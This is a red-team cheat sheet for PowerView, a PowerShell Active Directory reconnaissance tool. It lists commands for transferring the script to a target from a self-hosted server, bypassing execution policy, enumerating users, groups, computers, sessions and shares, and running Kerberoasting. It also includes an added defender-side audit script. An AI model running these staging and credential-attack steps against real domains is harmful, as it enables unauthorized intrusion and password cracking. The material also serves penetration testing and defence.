PowerView


What is PowerView?

PowerView is a PowerShell-based tool for gaining network situational awareness on Windows domains.

  • It acts as a PowerShell alternative to the net* commands

  • Leverages PowerShell AD hooks and underlying Win32 API functions to interact with Active Directory.

  • Ideal for reconnaissance and privilege escalation during red team engagements


Setup

  1. Download PowerView

mkdir /opt/ADtools
cd /opt/ADtools
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
  2. Host PowerView with Python's built-in HTTP server

python3 -m http.server
  3. Transfer PowerView to the target machine (replace 'url' with the address of the host serving the file)

powershell (New-Object System.Net.WebClient).DownloadFile('url','PowerView.ps1')
  4. Execution policy bypass

powershell -nop -ep bypass
  5. Import PowerView

To load all PowerView functions into the current session:

Import-Module .\PowerView.ps1

To run the script directly instead of importing it (note that functions defined this way live only in the script's own scope; dot-source the file, a leading dot and space before the path, if you want them to stay available in the session):

./PowerView.ps1

Active Directory Enumeration

Domain Enumeration

  • Get Domain info

Get-Domain
Get-NetDomain
  • Get domain SID

Get-DomainSID
  • Get domain controllers (Get-Domain -Domain queries a specific domain by name):

Get-NetDomainController
Get-DomainController
Get-Domain -Domain infosecwarrior.local

User Enumeration

  • List all users

Get-NetUser
  • Get a short list of users (common names only):

Get-NetUser | select cn
  • Get user principal names:

Get-NetUser | select userprincipalname
  • Get details of a specific user

Get-NetUser -UserName DevNull
  • Get a list of users in the current domain

Get-DomainUser
Get-DomainUser -Identity DevNull
Get-DomainUser | select samaccountname
Get-DomainUser | select samaccountname,logonCount
  • Get list of all properties for a user

Get-DomainUser -Identity DevNull -Properties *
Get-DomainUser -Properties samaccountname,logonCount
  • Search a specific string in a user's attribute

Get-DomainUser -LDAPFilter "Description=*built*" | Select name,Description

Group Enumeration

  • List all groups

Get-NetGroup
Get-NetGroup -Domain infosecwarrior.local
Get-NetGroup -AdminCount
  • List group members

Get-DomainGroupMember "Domain Admins"
  • Get group members

Get-NetGroupMember -GroupName "administrators"
  • List local groups on a machine

Get-NetLocalGroup -ComputerName WC01
  • Get members of a specific local group ("Administrators") on a machine

Get-NetLocalGroupMember -ComputerName WC01 -GroupName Administrators
  • Get domain groups and membership

Get-DomainGroup
Get-DomainGroup -Domain infosecwarrior.local
Get-DomainGroup *admin* | select Name
Get-DomainGroup *admin* -Domain infosecwarrior.local | select Name
  • Get all members of the "Domain Admins" group (including nested groups)

Get-DomainGroupMember -Identity "Domain Admins" -Recurse
  • Equivalent with the ActiveDirectory module cmdlet

Get-ADGroupMember -Identity "Domain Admins" -Recurse
  • Get the group membership for a specific user

Get-DomainGroup -UserName "DevNull"
  • Equivalent with AD cmdlet

Get-ADPrincipalGroupMembership -Identity Devnull

Computer Enumeration

  • List all computers

Get-NetComputer
Get-NetComputer -Ping
Get-NetComputer | select cn, operatingsystem
  • Get a list of all computers in the current domain

Get-DomainComputer | select Name
Get-DomainComputer | select dnshostname
Get-DomainComputer | select dnshostname, logonCount 
Get-DomainComputer | select Name, dnshostname, logonCount 
  • Get only the DNS hostnames of all computers, as plain strings rather than objects

Get-DomainComputer | select -ExpandProperty dnshostname 
  • Get computers running a specific OS

Get-DomainComputer -OperatingSystem "*Server 2022*"
  • Ping all discovered computers

Get-DomainComputer -Ping

Advanced Group and GPO Enumeration

  • Find GPO linked to a specific domain

Get-DomainGPO -Domain infosecwarrior.local
  • Get domain policies

Get-DomainPolicy
Get-DomainPolicyData -Policy DefaultDomainPolicy
Get-DomainPolicyData -Policy DomainControllerPolicy

Session and Logon Enumeration

  • Find machines where the current user has local admin access

Find-LocalAdminAccess
  • Get logged on users

Get-NetLoggedOn -ComputerName DC01.infosecwarrior.local
Get-LastLoggedOn -ComputerName DC01.infosecwarrior.local
Get-NetRDPSession -ComputerName DC01.infosecwarrior.local
Get-LoggedOnLocal -Computername WC01

Network Share and File Discovery

  • Find shares on hosts in current domain

Invoke-ShareFinder -Verbose
  • Find sensitive files on computers in the domain

Invoke-FileFinder -Verbose
  • Get all file servers of the domain

Get-NetFileServer

Attack Techniques

Kerberoasting

Request service tickets for accounts that have Service Principal Names (SPNs) and extract them for offline cracking

Invoke-Kerberoast
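As an added, defender-side example (not code from this cheat sheet or from the PowerView project), the script below reuses PowerView's Get-DomainUser to audit the same accounts Invoke-Kerberoast would request tickets for, so that privileged or stale service accounts can be remediated (long random passwords or a group managed service account) before anyone asks for their tickets. It assumes PowerView has already been imported into the session and that the 365-day password-age threshold is a local policy choice.

```powershell
# Added example, not part of the original page or of PowerView itself.
# Assumes PowerView.ps1 is already imported (see Setup above).
# Lists user objects carrying an SPN (the Kerberoast target set) and rates each
# one by whether it is privileged (adminCount=1, protected by AdminSDHolder)
# and by how old its password is.

$MaxPasswordAgeDays = 365   # assumption: local policy threshold for service accounts

function Get-KerberoastExposure {
    param(
        [string]$Domain = $null,                        # optional: audit another domain
        [int]$PasswordAgeThreshold = $MaxPasswordAgeDays
    )

    $params = @{
        SPN        = $true
        Properties = 'samaccountname','serviceprincipalname','pwdlastset','admincount'
    }
    if ($Domain) { $params['Domain'] = $Domain }

    # krbtgt also carries an SPN; Invoke-Kerberoast excludes it, so skip it here too
    Get-DomainUser @params | Where-Object { $_.samaccountname -ne 'krbtgt' } | ForEach-Object {
        # PowerView converts pwdlastset to a DateTime; a missing value is treated as stale
        $ageDays = if ($_.pwdlastset) { [int]((Get-Date) - $_.pwdlastset).TotalDays } else { $null }
        $stale   = ($null -eq $ageDays) -or ($ageDays -gt $PasswordAgeThreshold)
        $priv    = ($_.admincount -eq 1)

        # Score: privileged + stale password is the combination most worth fixing first
        $score = 0
        if ($priv)  { $score += 2 }
        if ($stale) { $score += 1 }

        [pscustomobject]@{
            Account         = $_.samaccountname
            SPNCount        = @($_.serviceprincipalname).Count
            Privileged      = $priv
            PasswordAgeDays = $ageDays
            StalePassword   = $stale
            RiskScore       = $score   # 3 = privileged and stale, 0 = neither
        }
    }
}

# Usage: show the findings worst-first, ready to paste into a remediation ticket
Get-KerberoastExposure | Sort-Object RiskScore, PasswordAgeDays -Descending | Format-Table -AutoSize
```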

Admin Privilege Hunting

Find local admin access

Invoke-EnumerateLocalAdmin

Network Share Discovery

Identify network shares

Invoke-ShareFinder
